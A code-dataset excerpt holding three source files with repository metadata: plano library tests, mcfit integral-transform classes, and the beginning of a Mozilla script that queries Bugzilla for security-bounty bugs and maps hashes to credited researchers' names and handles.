read_json("haberdash.json") assert result == ["ballcap", "fedora", "hardhat", "turban"], result run_command("haberdash", "ballcap", "--last", "turban") result = read_json("haberdash.json") assert result == ["ballcap", "turban"], result run_command("haberdash", "ballcap") result = read_json("haberdash.json") assert result == ["ballcap", "bowler"], result run_command("balderdash", "bunk", "poppycock") result = read_json("balderdash.json") assert result == ["bunk", "poppycock", "rubbish"], result run_command("balderdash", "bunk") result = read_json("balderdash.json") assert result == ["bunk", "malarkey", "rubbish"], result run_command("balderdash", "bunk", "--other", "bollocks") result = read_json("balderdash.json") assert result == ["bunk", "malarkey", "bollocks"], result @test def plano_shell_command(): python_dir = get_absolute_path("python") with working_dir(): write("script1", "garbage") with expect_exception(NameError): PlanoShellCommand().main(["script1"]) write("script2", "print_env()") PlanoShellCommand().main(["script2"]) PlanoShellCommand().main(["--command", "print_env()"]) write("command", "from plano import *; PlanoShellCommand().main()") with working_env(PYTHONPATH=python_dir): run("{0} command".format(_sys.executable), input="cprint('Hi!', color='green'); exit()") run("echo \"cprint('Bi!', color='red')\" | {0} command -".format(_sys.executable), shell=True) with expect_system_exit(): PlanoShellCommand().main(["no-such-file"])
ssorj/qtools
subrepos/plano/python/plano_tests.py
Python
apache-2.0
31,950
[ "Amber" ]
1e7afbb5e8d69b83e96402b83fd2322988c63de0e6a2bcd18e1986ec4c774c60
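A minimal sketch of a plano-style test module, using only API that the suite above exercises (the test decorator, working_dir, write/read, check_file, expect_error, run_tests); treating run_tests on the current module as the entry point is an assumption of this sketch.

from plano import *

@test
def file_roundtrip():
    with working_dir():  # run inside a throwaway temp directory
        f = write("greeting", "hello\n")
        assert read(f) == "hello\n", read(f)

@test
def missing_file_fails():
    with expect_error():  # check_file raises a plano error when the file is absent
        check_file("not-there")

if __name__ == "__main__":
    import sys
    run_tests(sys.modules[__name__])  # discover and run the @test functions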
""" =========================================== Common Integral transforms and applications =========================================== """ from __future__ import division from .mcfit import mcfit from . import kernels import numpy from scipy.special import gamma __all__ = ['Hankel', 'SphericalBessel', 'FourierSine', 'FourierCosine', 'TophatSmooth', 'GaussSmooth'] class Hankel(mcfit): """Hankel transform pair """ def __init__(self, x, nu=0, q=1, N=None, lowring=True): self.nu = nu UK = kernels.Mellin_BesselJ(nu) mcfit.__init__(self, x, UK, q, N=N, lowring=lowring) self.prefac *= self.x**2 class SphericalBessel(mcfit): """Spherical Bessel transform pair """ def __init__(self, x, nu=0, q=1.5, N=None, lowring=True): self.nu = nu UK = kernels.Mellin_SphericalBesselJ(nu) mcfit.__init__(self, x, UK, q, N=N, lowring=lowring) self.prefac *= self.x**3 class FourierSine(mcfit): """Fourier sine transform pair """ def __init__(self, x, q=0.5, N=None, lowring=True): UK = kernels.Mellin_FourierSine() mcfit.__init__(self, x, UK, q, N=N, lowring=lowring) self.prefac *= self.x class FourierCosine(mcfit): """Fourier cosine transform pair """ def __init__(self, x, q=0.5, N=None, lowring=True): UK = kernels.Mellin_FourierCosine() mcfit.__init__(self, x, UK, q, N=N, lowring=lowring) self.prefac *= self.x class TophatSmooth(mcfit): """Top-hat smoothing of a radial function """ def __init__(self, x, d=3, q=0, N=None, lowring=True): self.d = d UK = kernels.Mellin_Tophat(d) mcfit.__init__(self, x, UK, q, N=N, lowring=lowring) self.prefac *= self.x**d / (2**(d-1) * numpy.pi**(d/2) * gamma(d/2)) class GaussSmooth(mcfit): """Gaussian smoothing of a radial function """ def __init__(self, x, d=3, q=0, N=None, lowring=True): self.d = d UK = kernels.Mellin_Gauss() mcfit.__init__(self, x, UK, q, N=N, lowring=lowring) self.prefac *= self.x**d / (2**(d-1) * numpy.pi**(d/2) * gamma(d/2))
nickhand/pyRSD
pyRSD/extern/mcfit/transforms.py
Python
gpl-3.0
2,159
[ "Gaussian" ]
e799d7c242bf1a8550dafcb34d469d5ca81fc4d4cb6e58b89effad6c300de427
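A hypothetical usage sketch for the transforms above. Only the constructors are defined in this file, so the call convention transform(F) -> (y, G) is an assumption borrowed from the upstream mcfit package; the input profile and grid are made up for illustration.

# Sketch, assuming the vendored base class follows upstream mcfit's __call__.
import numpy
from pyRSD.extern.mcfit.transforms import SphericalBessel

r = numpy.logspace(-3, 3, num=2048, endpoint=False)  # log-spaced input grid
F = 1 / (1 + r*r)**1.5                               # a smooth radial profile

H = SphericalBessel(r, nu=0, q=1.5, lowring=True)
k, G = H(F)  # assumed: k is the output grid, G the l=0 transform of F

The FFTLog-style machinery behind mcfit expects logarithmically spaced input, which is why the grid above is built with numpy.logspace.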
#!/usr/bin/env python3 # -*- coding: utf8 -*- import requests import argparse import pprint import json import sys import re import hmac import time from datetime import datetime import os import base64 from requests.adapters import HTTPAdapter from requests.packages.urllib3.util.retry import Retry HEADERS = { 'Accept': 'application/json' } BASE_URL = 'https://bugzilla.mozilla.org/rest/' HMAC_KEY_ATTACHMENT_ID = 9133354 # Bug 1622495 search_url = BASE_URL + 'bug' + \ """ ?x=x &limit=0 &f1=classification &o1=notequals &v1=Graveyard &f2=OP &j2=OR &j3=OR &f3=OP &f4=flagtypes.name &o4=substring &v4=sec-bounty-hof%2B &f5=flagtypes.name &o5=substring &v5=sec-bounty%2B &f6=CP &f7=OP &f8=alias &o8=substring &v8=CVE- &f9=flagtypes.name &o9=substring &v9=sec-bounty- &f10=CP &f11=CP &classification=Client%20Software &classification=Developer%20Infrastructure &classification=Components &classification=Server%20Software &classification=Other """.replace("\n", "") CVE_REVIEW = """ https://bugzilla.mozilla.org/buglist.cgi?x=x &classification=Client%20Software &classification=Developer%20Infrastructure &classification=Components &classification=Server%20Software &classification=Other &f1=flagtypes.name &o1=substring &v1=sec-bounty- &f2=alias &o2=substring &v2=CVE-YEAR_REPLACEME &f3=flagtypes.name &o3=notsubstring &v3=sec-bounty-hof%2B &o4=notsubstring &f4=flagtypes.name &v4=sec-bounty-hof- """.replace("\n", "") credit_entries = { "fdfe2689e2668dcfe620ac81a741fde8":"Harsh Banshpal", "e6f0d7b286f04f05d4ac4ae498bf2a32":"Yaroslav Babin", "0c239777752cc449e91df93984e4c0c8":"Irwan", "4cc72613ad5eb1dc54b6acf0be217aed":"Mattias Jacobsson", "f72d4bcd18f0526f8faa4f781513c91f":"Hafiizh", "9513cb577e79e3f73e3af0886ba27e70":"Hou JingYi", "3ce577ba2fed1b2decbeb3eb4e466f8d":"Alesandro Ortiz", "e4c8c633605b27018520a5a35934c884":"Abiral Shrestha", "8aeb1a975c9c817eb6638851058fa5f2":"redparsec", "c37b0aecd957572ef3e680cd7494b864":"Felipe Caon", "305a3f15dfabae7353bf675ca5b7a23d":"Yangkang of 360 ATA Team", "15c2f9fe6f16230593ed3c11324c155e":"Maor Kleinberger", "a480398726999a758b808aed02ef5e5e":"Bui Dai Gia of VNG Corporation", "028ff665214190ae419f0febbdff465f" : "James Grant", "047a2ade7fdc3c6d84d5dbea228fe71e" : "Julien Maladrie", "05c9059021985684d94c2631e62b9d12" : "Zhang Hanming from 360 Vulcan team", "0a446dcb43d3f9f5da29afb14a40e58f" : "Taegeon Lee", "0add10eeb3f4f6b4ce9aee50e6e8e08d" : "Aaron Costello", "0c7f4b38ad0b504cfc48042e14564cc8" : "Paul Stone", "0cdb9b89f615c444f832e56c844e9e75" : "Allyson O'Malley", "0eaafbf6f9aabe86a4b040ca50d9191a" : "Shinto K Anto", "0f05e10145035903cbb34aac06f3edf6" : "Anonymous", "0f14322cc49704ac5551ffe5835abd69" : "Sree Visakh Jain (@sreevisakhjain)", "0fc499252d7f74175967ba225e186ed9" : "André Bargull", "0fed7c4928e7623eeabf7c040b6bc4a5" : "musicDespiteEverything", "11adc383a41d3f1fead9661104782014" : "Ronen Zilberman", "1248a90a05c7e3a46b97e6aceeb557ce" : "SkyLined", "13215febfe461aae88eda362e7c96cee" : "Eili Masami of Tachibana Lab", "14f41cb4275ed7f671a593138b886e84" : "Yasin Soliman", "158f1b632674edbf228a5d98269822af" : "Christian Holler", "15acbd736229d79a8ed92e690164559c" : "Nils André-Chang", "164a35fccb05c6bb8a26d881da42bda7" : "Muneaki Nishimura (a.k.a. nishimunea)", "18844199a107c0665b6de05b47ce0340" : "Colin D. 
Munro", "192aac4383d85b9acf43554612c6b461" : "Vitaly Nevgen", "192e0a963474e27f64bf46f0ddde8268" : "Seb Patane", "1a20e0311c4352bb986d6e876d4b6e89" : "Fourteenforty Research Institute Japan", "1a99b22b84db560244569dcbe868dcd0" : "Andrew Krasichkov", "1ababea19b88a30da141dca3bdf006d4" : "sushi Anton Larsson", "1ad1f39c1e7968ff5cfe318281e0455f" : "Tyson Smith", "1b46bfa367b8cddece232ebfddaccc9d" : "Fabián Cuchietti", "1c04ef59bd60189ce09cfca187225e75" : "Mohammed Fayez Ahmed Albanna", "1cc583009e744f3a2e63c6ca0ca72c10" : "Dhiraj Mishra", "1ced3fc2a9846c0b8a9e99db5416fc29" : "Holger Fuhrmannek", "1d239c1ff42a3e8e1c16c976020fd45f" : "Philipp Kewisch", "1d2c94a3301ca111ff6bb161b3069a9c" : "Anonymous", "1d6eb1c6e8a177847eca74cad00fc301" : "José María Acuña Morgado", "1e304bfde59dcfb0131e21e913281614" : "Luigi Gubello", "1e7c9dd1924cf9763c2507c94be341c2" : "Linus Särud", "1ffe73fabf298c651b7a8c750de530d2" : "Siraje Amarniss of Fukusa", "21c712eaa986e0ae3e135fe689259684" : "Matthew Somerville", "2841918025ae79884c3eac763a453b76" : "Jens Gorontzi", "2920656b8c8d785f7ccecab735a106a8" : "SkyLined", "2bb8b9860ce62f3fbc9e7eec1a9d5ed0" : "Giorgio Maone of NoScript", "2cbc00679c4b47da86d775e2c98d4bd6" : "Zhou Yuyang", "302a4e6aa69950cd60e295d433440bd3" : "Gustavo Grieco", "311d66bfb9fbda45dc6920920a9efb5e" : "Andrea.", "315a4e71ad122182426d8da0d5d1e8fb" : "Michael Smith", "31b9334ff2ac135414563035a5c11823" : "Context Information Security", "337554f7f0ac9ded2ef6110a7a12910b" : "David Dworken", "342df00dfa13da31ecc6efe69d5f6da6" : "moz_bug_r_a4", "3597ac4747474360b391a5e359948ca9" : "Mario Gomes", "359ee9ee2e4c35e5fa8097e48bd22c50" : "Vladimir Metnew", "373ff2b767419c0619f3991348f8d930" : "David Chan", "37a2557cee7c4198951b1af8b1243a2e" : "Georg Koppen of The Tor Project", "38161e481b381a72de3c4804a292d4ab" : "Atte Kettunen", "39897587a528519753812e6f6256f6bd" : "firehack", "399471310b07538c814c230e9029b0bb" : "Wladimir Palant", "3a98d1971bc7fab8d457063492a5a467" : "Rafay Baloch of Pakistan Telecommunications Authority ", "3c098d6ead472177028bde34acacb5f1" : "Takeshi Terada of Mitsui Bussan Secure Directions Inc.", "3c9e02bf1983fa620099841bb91ea3e0" : "Sergey Bobrov", "3f3a7252004367671037582e9dde174d" : "Luca Moretto", "3f3fae9ad20da4c5655ceda765563e6c" : "Benjamin Kunz Mejri", "43b406ebd2c3d45534aec1e4843ba504" : "Bharadwaj Machiraju", "45e5fe739d4a915a757b37940170e852" : "Harry Gertos", "4649493b3babcd55144931b73a973bce" : "Yaniv Frank with SophosLabs", "46b96542a8687c90e46400e780b6b4ac" : "Anonymous", "47403ba3cf9bcae0874a07f299f643f0" : "Chris Rohlf", "480d732942ba3ecdedf961ce3fa9fc64" : "Ademar Nowasky Junior", "49c31aaa040fce3a5fcaf771ad56b382" : "AaylaSecura1138", "4a5880b0447f7349c9cbcff76045b3e6" : "Rayyan Bijoora", "4a66274c7f1063c7ef3b3c3d9f747566" : "Craig Disselkoen", "4b52df50eaaf097f6f062bfea6cf0abe" : "Artur Osiński (Virtual_ManPL)", "4b7fd0d6665950db856bc5e22846f719" : "Tobias Klein", "4bf2165b96b2506a0ac2212b39fb78b1" : "Clémentine Maurice", "4cb38b42bb161ce775b5e7f91d260d3f" : "Daniel Maksimovic", "4ea165c7445cfa9a7ed0685e64cdf1fb" : "Paul Stone of Context Information Security", "5080064df3a2c21441c9fb6cc3b5f816" : "Jerry Decime", "50ab8d7a3724d141c8f5cd8797d66977" : "Xiaoyin Liu", "55f0363f4c86284fe5689525c5640c32" : "Riccardo Ancarani", "59260d270baa2ce555fcf323c46d0c03" : "Codermak", "5fbaf4a6794928a04644d7a0a73f7141" : "Alexander Klink", "647f1e3053ac60b34405e11876ec02e4" : "Juho Nurminen of Mattermost", "64e04ce43d3007a00b51c63553c48efb" : "p4fg", "654445704639346f526d1ef514d08fd7" 
: "ACROS Security", "668988e8a957c941b5b3619cfdc005d1" : "XiaoXiong(superxx) of Qihoo 360 CERT", "66c52290aeab671fa01c2e062f6c2e01" : "Karl Aparece", "690334c0cae6df099269d105526a42f3" : "Jordi Chancel", "6b04af2a3e852190d05cc5a05b438d2e" : "Ulrich Günther", "6c5314d59c2e56564b18fe6199305fd3" : "Abdellah Nadi", "704b002c6bd62215d3738f6fe9c6524a" : "Gregory Smiley of Security Compass", "70cc13ce2ba436916140efa887a10fca" : "Falko Strenzke of cryptosource GmbH", "71106bd16473852ff8d395e9eb2be45c" : "mlfbrown", "719febfa274b646e3b33d2b9f95885c4" : "obmi", "723fd46df5eb10ad0fa79da65d7cc961" : "Samuel Erb", "740b81a60bd25700b839f63e8d937796" : "Karthik Kumar reddy", "7495547634e174c0e2f49e939d6fe3ee" : "Scott Bell", "75488be765fd509d904767102b6bb6b7" : "Mario Heiderich", "755ae0590425c02b3c203036df1a7e1e" : "Tim Hemel", "75b14a4315405e7480d0620b8eb3c11c" : "Flo van der vlist", "7645f2eb64dccd9602b24b6ce9fce138" : "Chun Han Hsiao", "76d59fb088161da3466512c6d304ca2f" : "Jordi Chancel", "77af16493363287bc9b6ed99548293d7" : "Aryan Sinha", "77b1dc2043055d86d9e81b5035efe29f" : "Irvan Kurniawan (sourc7)", "78eeb94fe5fe67f95d9cd574d9ec69db" : "Inko", "7a3d52ef9f515ad5d4aad5868c2e65aa" : "Chamal De Silva", "7aba285c7e4b7f41df3dae6f4becd2a9" : "Sebas (@0xroot)", "7b33d07bc038c1ec083e51e31e139fdb" : "Joshua Graham of TSS", "7bd9d5640cb0f0dd5e59ccd7b02a0349" : "Abraruddin Khan and Omair", "7bed3bd152a0fd4badc6d2ddd4e86e1b" : "Rafael Gieschke", "7dc3304d4c7f8d13fa0f248f54b07a20" : "Kaspar Brand", "7e1e41ab0cd46a4a32c82def7b840a6d" : "Mario Heiderich of Cure53", "7ec079736a63d226ce3b436b5f49b1d9" : "Daniel Santos", "7edb6115b239d771b9689857b9e95568" : "Hanno Böck", "7fa6444936bd7ae17ecad924fca93c6d" : "Luis Merino - Brandon Perry", "80e0b8cb2a22f8b9669d2ca1968ce898" : "Eduard Wirch", "81236113f95cd9d1591343e78fe204c5" : "Dongsung Kim", "815f2b92b84655f6a7e9e53ad10e78f4" : "Mitchell Harper", "817bd7bdff0d93ccdada8707b5278a08" : "Alexander Nagy", "82d7844614f152d6865e83d43f040a8b" : "Antonio Sanso", "8314603008777278fd70c0b9b4f01645" : "Adam Barth", "8363fd9f9f37fbaf5d600e676bf3aec5" : "Muhammad R. 
Maulana", "853c74a41a0a08216a565eb558b2c4c4" : "bo13oy of Qihoo 360 Vulcan Team", "87b3f4e2ea33d7e5aea49e26dab8ab5b" : "Jethro Beekman - Security Researcher at University of California - Berkeley", "87c66fa50295d7055022c4625c76b208" : "Rain", "887ba2d86d5c5c29814a38c371854928" : "Soroush Dalili", "89a138d6477c6a80b7f6c2e59a6c2fa4" : "Anurag Jain", "89ae6542ce619780d318477fe724bb57" : "gfleischer", "8de462f5f2d47748bcd761a45f2f157c" : "Nicolas Golubovic", "8f3b70144b559447d576b239d48e3b77" : "Max May", "8ff363f2185736b3ad47f35f8140c82a" : "Mei Wang of GearTeam Qihoo 360.", "9219e61c33ff1e2d14b670b865caffa8" : "Nikhil Mittal", "9228cdb27944fb384f1305d2d0c350b8" : "Tushar Rawool", "92979b13d84087187a7d5630e1c76b87" : "Luke Li", "937c35a7adce7a73254cf0c2ed905e9c" : "Raphael Shaniyazov", "95663a4cc4fa467fdd949b16b6e03760" : "knud", "9667bad21b75845c367e1c91ea59d788" : "jensvoid", "9684d8c1d955335cb2ba23ddab9769ac" : "Rotem Kerner", "96b79d035cfa51215a941052528e9182" : "Michał Bentkowski", "977f16d94af9ed0b87f3d10b766f4f07" : "Jesse Luoto", "9832ee85d3227243306872874b7157ea" : "Jianjun Chen", "9a7ef4ebc1fe8c5e7f59016564db97b4" : "Yossi Oren", "9a9379446b32063fe371d116fb21deef" : "Leo Starcevic", "9b50ae1f239de9709af5f1db53629f8c" : "Ravi Kishor", "9d3bc5f160291389423da6ff52f5bc44" : "Luật Nguyễn", "9d69c86b66ca54565cd98aec6b6baaa3" : "Ahmed Elsobky", "9d729c1661a6d2474eb380131765eb6a" : "Abhishek Arya", "9d81009615f1e3b3b269eb78a4abd529" : "David Huang", "9d94a16c3719a01989b3eea98217cbfa" : "Dave Yesland", "9de234ea6d5568ef604dd3431af941e4" : "James Lee", "9e6d48cc96c5931585cbe2bfc66246b8" : "Aki Helin", "a01c8445e5c582a2465b1ff75ab6b4d9" : "Pedro Oliveira", "a63f14172a1a1763ebe352317a9c9156" : "Nassim Bouali", "a71a35e2a42f69964a986531483ab405" : "Jack Wrenn", "a72696a2089d2ea69143161018fa7c23" : "Zhong Zhaochen", "a8b84761cdafee6392f64aa115edc48b" : "Andrei Cristian Petcu", "a9173d90c2151988a643fee35abafb9f" : "Juho Nurminen", "a9e1d36bf363994f9a39353d1e384eab" : "guyio", "ab37a4ca424a143670adc9093c7086b9" : "Scott Bell", "ab52f2c4485ec82dcd6b5c36b845e6d5" : "James Kitchener", "ab54897026ce6f76bb9cbaf9a86a1fc8" : "Brian 'geeknik' Carpenter", "abb98d52131c2c03f832122ea7f9308b" : "Ismail Tasdelen", "ac6cb3312f13091a2b1ab69bb496057d" : "Rob Wu", "ad4e3024178ee23278381ebfbc54528f" : "Looben Yang", "adbee288a6f9cf15602fda47356d5175" : "Hany Ragab; Enrico Barberis; Herbert Bos; Cristiano Giuffrida", "af5f683612b2560ceeb75586a09f8525" : "Arvind", "b1448aa9184c61d226eb2d9901d6ae35" : "Krzysztof `vnd’ Katowicz-Kowalewski", "b16601816f98299912f0ea692e738c05" : "Anonymous", "b18940ae4a081c594022bcd56e7d949a" : "Ronald Crane", "b1a7c3c63dd184cfac07998a22977ccc" : "Harshit Mahendra", "b1a7d637734d5dad9b43136609c8f31f" : "Ronald Crane", "b1bce803655916f8687d2da2787a17c6" : "Clément Lavoillotte", "b309975ebb9ea77a8021712f1fc0d908" : "Ezra Caltum", "b39f833e348ce97f571df4efc94ee88d" : "Kaizer Soze", "b55ff048a2450ef3b41abb9208d836d6" : "Diego Calleja", "b5e1a616809a7f78f4b1709fa2cae1ac" : "Steven M Crane", "b6bf77041fb088d18af139e5eeafb4e9" : "Mohammed Mido from connectps.com", "b7b33547a73d2d2c7325f2c47406805f" : "Rakesh Mane", "b99b716bfc8db49cb857b8996fdc39f1" : "Arthur Edelstein", "ba257210862ef5ec1080279dd1bec6c4" : "Ken Okuyama", "bc1ce7e8b84b814c2eaf2566e4787881" : "Brian Smith", "bc9f571d28511fa67d79a20b81d1cd58" : "Kalel", "bca639214bd2b582e62763ecc183babd" : "Mike Cardwell", "bf39fa273742eda0011a11c8e5369e4b" : "Nicolas Grégoire of AGARRI", "c0b9ff5423b4fb9dc26b58576cd4497a" : "Toni Huttunen", 
"c0f5791dfa8c00979d4df44e3f25f884" : "Nicolas Trippar of Zimperium zLabs", "c154b0d9921cf1fdb945c0b446cc28e7" : "Anonymous", "c4d4cb75f73c13335d00b84a245e8543" : "Zijie Zhao", "c4e343b957ed04e78035e9f1e9b99290" : "Filipe Gomes", "c78082d6d5aae54b54f48cecc0f97bed" : "Ms2ger of Igalia", "c8828ea7069b5acf239d313675eec592" : "R at Zero Day LLC", "ca5c500dbd892f7c06f6a7323220b2b6" : "Scott Zimmermann", "cbbcaac86318f769b1f0b9237af85927" : "Yuji Tounai of Mitsui Bussan Secure Directions, Inc.", "cc25b3565b0e7f0a2bde8c4e8cecbbd5" : "Nikita Arykov - Security Architect at Pushwoosh Inc.", "cc84fd0104bbdf21f5ebfe017f47ba31" : "Quarkslab security engineer Francis Gabriel", "cd0b10f0a5f56b3d04ea1a11cd009500" : "Aki Helin", "d4c22b801d906fd988e857e28e0d4398" : "team509", "d53d5650291b09956d8d8fdc488e1d5b" : "Armin Razmjou", "d6baf622b490bffd8c025e615ef460d2" : "crixer", "d77e4bf715af2d76c9c3ae565a21d40f" : "Gary Kwong", "d8edb7c1182dd0cc123dc47dcac28cee" : "Zhanjia Song", "d9147aad8edeb19e373570a6cb612b31" : "Rhys Enniks", "da370b9a066b1f80464a33801840e392" : "Team sutegoma2 - Japanese CTF team from AVTOKYO", "db59cb01d7b08db1a46c7f7834ff21fa" : "Iain Nicol of Iainteractive", "dd54e66b7d54126ca5647d1fd2492353" : "Craig Disselkoen", "ddab7e562afbe5ef1b37ad29ed33effe" : "Lukas Bernhard", "ddc9459ee44cb5366ad418f992aa47a3" : "Brandon Wieser of Cyber Sensei", "de93fee584390b928b2d12bd3d198fc0" : "0days Engineer", "dfce8e4c8278c73ffa3ace9344e86572" : "Antoine Delignat-Lavaud", "e064c5dd0686bd77a7bb7cc538547d8d" : "Jethro Beekman - Security Researcher at University of California - Berkeley", "e0a2ecaef5c7fa9bf90731771aac2e95" : "Marc Schoenefeld", "e0d23fbace24417f6260c181a10b0f3f" : "Tadj Youssouf", "e22e60864c27178d2469566dbcfb4e09" : "Michal Zalewski", "e2b442dbd6ddf0e28802b71bb4cf4376" : "Artur Osiński (Virtual_ManPL)", "e310574c3c35c503d99ef03885b7ef3a" : "Jay Gilbert", "e33752885775e4a274c6db31c995434b" : "Brian Carpenter of Geeknik Labs & Farm", "e4e810ec230795b44abbeb37d56b86e8" : "Abdulrahman Alqabandi of Microsoft Browser Vulnerability Research", "e5d2322aa516d90b7eb9a84d7b890938" : "Björn Ruytenberg", "e750febf3b1e213b458f017fac835b27" : "Rh0", "e751036f55bbf501042162b16c883b4e" : "Nicolas Francois", "e7ae95aeff3bef60565d9a3bed3cfe46" : "Frederic Besler @ LAF INTL", "e875c787e17ec52abf8d743191dfdb57" : "Jun Kokatsu", "e88dc79e62596108bef66ec6d6d103fa" : "Wladimir Palant", "e8abc376c3254bcb714b250241b75011" : "insertscript", "e8df4fcdfce3352bfa7c8cc4f30cf852" : "Thomas Imbert", "e8f888d34d0dea54f388def803d7b4ab" : "Vladimir Dmitriev", "e98a60be99d8cad03ab7bda278934d00" : "Matheus Vrech", "ea3d4c453e3dcd5b7c3430a9d3b5cecf" : "Jann Horn", "ebb36808fc8bce5670bf7c40f8f79a07" : "Gunes Acar", "ec2382571a4578416a9eef5ec2e8a937" : "Nils", "ecbb5f9fa8cdf3d6339da4dc4bd08593" : "Thai \"thaidn\" Duong", "eeb20e34ecf97f18c09819a8189a917a" : "Masato Kinugawa", "f1bf10afb7f316883b9f79f73f72786a" : "Wen Xu of SSLab Georgia Tech", "f1d319a4f2eaf69d8489a741df1500d8" : "Francisco Alonso", "f2c90725c145fe10ebe35533891a1cbc" : "fatal0", "f42ea3053e8f3c5af81d1a33cb46e47e" : "Tsubasa Iinuma of Gehirn Inc.", "f45fcaee888e8eab311d5d869b48f6e4" : "Zach Hoffman", "f46a207798ca14de0287172ce8d47783" : "Linus Särud", "f5550452710913283cbf6db0976e2420" : "Konark Modi of Cliqz GmbH", "f6628355de51d96186ee030cb936b04b" : "Pham Bao of VinCSS (Member of Vingroup)", "f6b2efbb344d0d64af70bcae3e3fc896" : "Mohammad Owais", "f8266c7296c7f7d996e0040ad7843bf0" : "Robert Kugler", "f9a504736e3206f7ab9995d0dda25a63" : "Boopathi Senthilkumar", 
"fa9ffd84a1dd2951bcb0d7f8ebae5c84" : "Philip Okhonko", "fcf7ed040fa3561f7c7f23784de25ca6" : "R at Zero Day LLC", "fe7f319c61c0b44d4cb751afda4f4aeb" : "Gaurav Popalghat", "fea05bd1b815660051bf5d090eb4e522" : "Aral Yaman", } twitter_entries = { "9513cb577e79e3f73e3af0886ba27e70":"@hjy79425575", "e4c8c633605b27018520a5a35934c884":"@proabiral", "8aeb1a975c9c817eb6638851058fa5f2":"@R3dpars3c", "305a3f15dfabae7353bf675ca5b7a23d":"@dnpushme", "0c7f4b38ad0b504cfc48042e14564cc8" : "@pdjstone", "0cdb9b89f615c444f832e56c844e9e75" : "@ally_o_malley", "0eaafbf6f9aabe86a4b040ca50d9191a" : "@5hint0", "192e0a963474e27f64bf46f0ddde8268" : "@sebbity", "1cc583009e744f3a2e63c6ca0ca72c10" : "@RandomDhiraj", "1d239c1ff42a3e8e1c16c976020fd45f" : "@pkewisch", "3597ac4747474360b391a5e359948ca9" : "@netfuzzer", "359ee9ee2e4c35e5fa8097e48bd22c50" : "@vladimir_metnew", "38161e481b381a72de3c4804a292d4ab" : "@attekett", "3a98d1971bc7fab8d457063492a5a467" : "@rafaybaloch", "3c9e02bf1983fa620099841bb91ea3e0" : "@Black2Fan", "480d732942ba3ecdedf961ce3fa9fc64" : "@nowaskyjr", "4a5880b0447f7349c9cbcff76045b3e6" : "@Bijoora", "4bf2165b96b2506a0ac2212b39fb78b1" : "@BloodyTangerine", "5080064df3a2c21441c9fb6cc3b5f816" : "@declme", "55f0363f4c86284fe5689525c5640c32" : "@dottor_morte", "59260d270baa2ce555fcf323c46d0c03" : "@arshadkazmi42", "64e04ce43d3007a00b51c63553c48efb" : "@p4fg", "7ec079736a63d226ce3b436b5f49b1d9" : "@bananabr", "81236113f95cd9d1591343e78fe204c5" : "@kid1ng", "815f2b92b84655f6a7e9e53ad10e78f4" : "@HarperMitchell", "82d7844614f152d6865e83d43f040a8b" : "@asanso", "8363fd9f9f37fbaf5d600e676bf3aec5" : "@agamimaulana", "89a138d6477c6a80b7f6c2e59a6c2fa4" : "@csanuragjain", "9219e61c33ff1e2d14b670b865caffa8" : "@c0d3G33k", "9667bad21b75845c367e1c91ea59d788" : "@jensvoid", "977f16d94af9ed0b87f3d10b766f4f07" : "@luotojesse", "9832ee85d3227243306872874b7157ea" : "whucjj", "9a7ef4ebc1fe8c5e7f59016564db97b4" : "@yossioren", "9d3bc5f160291389423da6ff52f5bc44" : "l4wio", "9d69c86b66ca54565cd98aec6b6baaa3" : "@0xsobky", "9de234ea6d5568ef604dd3431af941e4" : "@Windowsrcer", "a01c8445e5c582a2465b1ff75ab6b4d9" : "@kanytu", "a9173d90c2151988a643fee35abafb9f" : "@jupenur", "af5f683612b2560ceeb75586a09f8525" : "@ar_arv1nd", "b1a7c3c63dd184cfac07998a22977ccc" : "@hm_harshit", "b1bce803655916f8687d2da2787a17c6" : "@clavoillotte", "b5e1a616809a7f78f4b1709fa2cae1ac" : "@stevenmcrane ", "cbbcaac86318f769b1f0b9237af85927" : "@yousukezan", "dd54e66b7d54126ca5647d1fd2492353" : "@craigdissel", "e33752885775e4a274c6db31c995434b" : "@geeknik", "e4e810ec230795b44abbeb37d56b86e8" : "@qab", "e875c787e17ec52abf8d743191dfdb57" : "@shhnjk ", "e8abc376c3254bcb714b250241b75011" : "@insertscript", "e8df4fcdfce3352bfa7c8cc4f30cf852" : "@masthoon", "ecbb5f9fa8cdf3d6339da4dc4bd08593" : "@xorninja", "f1d319a4f2eaf69d8489a741df1500d8" : "@revskills", "f2c90725c145fe10ebe35533891a1cbc" : "@fatal0_", "f42ea3053e8f3c5af81d1a33cb46e47e" : "@llamakko_cafe", "f45fcaee888e8eab311d5d869b48f6e4" : "@zrhoffman", "f46a207798ca14de0287172ce8d47783" : "@_zulln", "f5550452710913283cbf6db0976e2420" : "@konarkmodi", "f6b2efbb344d0d64af70bcae3e3fc896" : "@_mohammadowais", "fa9ffd84a1dd2951bcb0d7f8ebae5c84" : "@sysmus28", "fe7f319c61c0b44d4cb751afda4f4aeb" : "@Gaurav_00000", } url_entries = { "e6f0d7b286f04f05d4ac4ae498bf2a32":"https://linkedin.com/in/yarbabin", "fdfe2689e2668dcfe620ac81a741fde8":"https://www.linkedin.com/in/harshbanshpal/", "f72d4bcd18f0526f8faa4f781513c91f":"https://www.linkedin.com/in/hafiizh-7aa6bb31/", 
"a480398726999a758b808aed02ef5e5e":"https://www.linkedin.com/in/yabeow/", "0f14322cc49704ac5551ffe5835abd69" : "https://www.wayanadweb.com", "1248a90a05c7e3a46b97e6aceeb557ce" : "https://skylined.nl", "15acbd736229d79a8ed92e690164559c" : "https://www.nilsand.re/", "18844199a107c0665b6de05b47ce0340" : "https://www.tattiebogle.net/", "192aac4383d85b9acf43554612c6b461" : "https://facebook.com/vitaly.nevgen", "1c04ef59bd60189ce09cfca187225e75" : "https://www.linkedin.com/in/mohammedfayez", "1d6eb1c6e8a177847eca74cad00fc301" : "https://tecnoblog.guru/", "1e304bfde59dcfb0131e21e913281614" : "https://gubello.me", "1ffe73fabf298c651b7a8c750de530d2" : "https://fukusa.nl", "21c712eaa986e0ae3e135fe689259684" : "http://dracos.co.uk/", "2841918025ae79884c3eac763a453b76" : "https://koelner-pc-hilfe.de", "2920656b8c8d785f7ccecab735a106a8" : "https://skylined.nl", "2bb8b9860ce62f3fbc9e7eec1a9d5ed0" : "https://maone.net", "3c098d6ead472177028bde34acacb5f1" : "http://www.mbsd.jp/", "3f3fae9ad20da4c5655ceda765563e6c" : "https://www.vulnerability-lab.com", "47403ba3cf9bcae0874a07f299f643f0" : "https://struct.github.io", "4a5880b0447f7349c9cbcff76045b3e6" : "https://facebook.com/Bijoora", "4b7fd0d6665950db856bc5e22846f719" : "http://www.trapkit.de/", "4cb38b42bb161ce775b5e7f91d260d3f" : "https://www.linkedin.com/in/daniel-maksimovic-73537882", "654445704639346f526d1ef514d08fd7" 